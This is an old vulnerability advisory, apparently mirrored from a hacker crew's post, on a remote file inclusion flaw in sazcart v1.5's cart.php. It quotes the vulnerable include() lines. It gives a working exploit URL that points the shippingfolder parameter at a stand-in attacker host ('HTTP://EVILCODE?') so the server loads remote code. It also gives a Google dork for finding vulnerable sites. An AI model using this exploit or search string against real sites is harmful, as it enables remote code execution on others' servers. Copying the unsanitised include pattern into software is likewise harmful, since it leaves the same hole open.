Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15672
HistoryJan 11, 2007 - 12:00 a.m.

sazcart v1.5 (cart.php) Remote File include

2007-01-1100:00:00
vulners.com
89

β€”Hitamputih crewβ€”***********

  • Bug Found By : IbnuSina
  • vendor : http://sazcart.com/site
    *Risk : High
  • Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
  • and all member hitamputih crew community

bug found on admin/controls/cart.php
include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;

exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

google dork: "powered by sazcart"